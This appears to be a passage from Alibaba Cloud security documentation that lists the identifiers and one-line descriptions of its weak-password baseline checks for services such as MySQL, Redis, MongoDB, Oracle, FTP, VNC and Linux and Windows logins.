Alibaba Cloud standard: Apache Tomcat security baseline check

weak_password

hc_mongodb_pwd

Weak password: MongoDB logon weak password detection (version 2.x)

hc_weakpwd_ftp_linux

Weak password: FTP logon weak password check

hc_weakpwd_linux_sys

Weak password: Linux system logon weak password check

hc_weakpwd_mongodb 3

Weak password: MongoDB logon weak password detection

hc_weakpwd_mssql

Weak password: SQL Server database logon weak password check

hc_weakpwd_mysql_linux

Weak password: MySQL database logon weak password check

hc_weakpwd_mysql_win

Weak password: MySQL database logon weak password check (Windows)

hc_weakpwd_openldap

Weak password: OpenLDAP logon weak password check

hc_weakpwd_oracle

Weak password: Oracle logon weak password detection

hc_weakpwd_pgsql

Weak password: PostgreSQL database logon weak password check

hc_weakpwd_pptp

Weak password: pptpd service logon weak password check

hc_weakpwd_redis_linux

Weak password: Redis database logon weak password check

hc_weakpwd_rsync

Weak password: rsync service logon weak password check

hc_weakpwd_svn

Weak password: SVN service logon weak password check

hc_weakpwd_tomcat_linux

Weak password: Apache Tomcat console weak password check

hc_weakpwd_vnc

Weak password: VNC Server weak password check

hc_weakpwd_weblogic

Weak password: WebLogic 12c logon weak password detection

hc_weakpwd_win_sys

Weak password: Windows system logon weak password check